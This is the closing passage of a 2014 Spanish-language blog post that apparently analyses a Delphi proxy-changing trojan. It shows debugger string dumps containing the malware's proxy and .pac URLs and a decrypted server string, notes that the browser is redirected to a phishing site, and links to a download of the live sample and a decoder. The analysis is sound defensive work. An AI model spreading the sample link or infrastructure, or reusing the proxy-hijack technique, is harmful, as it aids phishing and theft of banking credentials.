<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: x-small;"><span style="line-height: 20px;">0012FDE8 |00BCB5BC UNICODE "http://www.agoracadastre.com.br/proxy/RRU8PAYVBF2U412715V3/"</span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: x-small;"><span style="line-height: 20px;">0012FDEC |00BCB4FC UNICODE "?MD5=be84e40f0fb2cd36ce74bd9c0d1df90d"</span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: x-small;"><span style="line-height: 20px;"><br /></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: Courier New, Courier, monospace; font-size: x-small;"><span style="line-height: 20px;"><br /></span></span></div>
</div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; line-height: 20px;"><span style="font-family: Arial, Helvetica, sans-serif;"><b>String entregado por el servidor</b></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: 'Courier New', Courier, monospace; font-size: x-small; line-height: 20px;"><br /></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: 'Courier New', Courier, monospace; font-size: x-small; line-height: 20px;">"Q7HqS3elBp4vCYunEJWkE3akCJauBr9ILJXGGLbMGaOoLJGnCZSnDLOpBd1XOm"</span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; line-height: 20px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; line-height: 20px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; line-height: 20px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /><b>Desencriptado queda:</b></span></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: 'Courier New', Courier, monospace; font-size: x-small; line-height: 20px;"><br /></span></div>
<div class="span8 columns" style="float: left; margin-left: 20px; min-height: 1px; width: 620px;">
<span style="color: #333333; font-family: 'Courier New', Courier, monospace; font-size: x-small; line-height: 20px;"> |00BCB67C UNICODE "http://192.198.89.198/RRU8PAYVBF2U412715V3.pac"</span></div>
</div>
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<br /></div>
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvl4-oGy6lsso01xvS68hL1fmmFdE9XHGUwMKoqEV2wddbQSn6KBb2X2eFGZdFmjDV_HpiB1V0m1jRA488thsIr3uR03Hi631crukmq2HHv4yiENarWVp5JgWo2IU3OvqNiEiWshY5Q0Q/s1600/trafic.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvl4-oGy6lsso01xvS68hL1fmmFdE9XHGUwMKoqEV2wddbQSn6KBb2X2eFGZdFmjDV_HpiB1V0m1jRA488thsIr3uR03Hi631crukmq2HHv4yiENarWVp5JgWo2IU3OvqNiEiWshY5Q0Q/s1600/trafic.jpg" height="420" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7S3yeKGTRO41MswUV3MY1bWyDiqUHrpd7mJEsZGIdbRPBuHrhHJ2VpLDh9U7cDwZcrb0zEuaemLQDerO-dxRq5W3RrtaWY-iin6FfJMZf2Rm91dXYmmTPUN1UF5i9aDatYC9Ue_WsbA4/s1600/trafic2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7S3yeKGTRO41MswUV3MY1bWyDiqUHrpd7mJEsZGIdbRPBuHrhHJ2VpLDh9U7cDwZcrb0zEuaemLQDerO-dxRq5W3RrtaWY-iin6FfJMZf2Rm91dXYmmTPUN1UF5i9aDatYC9Ue_WsbA4/s1600/trafic2.jpg" height="352" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Configuración de Red del navegador. (usar Scripts de configuración automática)</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgACDu9dgMJGD1lAcjEewJVSbLp_wMBmFmsp6o3vvIeRtkAqAsKDpNCo1vWemo6tJ3kNiC-6Sw0pfTzHgXS_zOIOZ9PpE_7ldM_8gRxVP53ImL9dIAKDZMA_YVvRNm3prP7n7V6sYDPOBE/s1600/proxy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgACDu9dgMJGD1lAcjEewJVSbLp_wMBmFmsp6o3vvIeRtkAqAsKDpNCo1vWemo6tJ3kNiC-6Sw0pfTzHgXS_zOIOZ9PpE_7ldM_8gRxVP53ImL9dIAKDZMA_YVvRNm3prP7n7V6sYDPOBE/s1600/proxy.png" height="400" width="296" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Navegador redirigido a un sitio de phishing.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2_7QQDOORiZisGLc1XYrKKouLwl5UQkhi4-WhyphenhyphenOxvbKVJHDZOHiW6kpE5uv5pAL0hIRnUQ4XgikSTWIzlWbffOdiypUiLlt9xcCIyk6EhBqj4Ds4vYPysJt6OQo3CFcJLf8URtULjWkw/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2_7QQDOORiZisGLc1XYrKKouLwl5UQkhi4-WhyphenhyphenOxvbKVJHDZOHiW6kpE5uv5pAL0hIRnUQ4XgikSTWIzlWbffOdiypUiLlt9xcCIyk6EhBqj4Ds4vYPysJt6OQo3CFcJLf8URtULjWkw/s1600/12.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<br /></div>
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<br /></div>
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Muestra: https://www.dropbox.com/s/jx26orkjvyoxqop/ProxyChanger%2009-05-14.rar</span><br />
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span>
<span style="font-family: Arial,Helvetica,sans-serif;">Decoder: https://www.dropbox.com/s/kthppdb512lsf2s/DelphiDecript.rar</span></div>
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<br /></div>
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<br /></div>
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<div style="background-color: #fefdfa; color: #333333; line-height: 18.200000762939453px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Eso fue todo por el momento.</span></div>
<div style="background-color: #fefdfa; color: #333333; line-height: 18.200000762939453px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="background-color: #fefdfa; color: #333333; line-height: 18.200000762939453px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="background-color: #fefdfa; color: #333333; line-height: 18.200000762939453px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="background-color: #fefdfa; color: #333333; line-height: 18.200000762939453px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="background-color: #fefdfa; color: #333333; line-height: 18.200000762939453px;">
<span style="font-family: Arial, Helvetica, sans-serif;">@Dkavalanche 2014</span></div>
</div>
<div class="span8 columns" style="background-color: white; float: left; margin-left: 20px; min-height: 1px; orphans: auto; text-align: start; text-indent: 0px; widows: auto; width: 620px;">
<br /></div>
<span style="background-color: #fefdfa; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.200000762939453px;"><br /></span>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0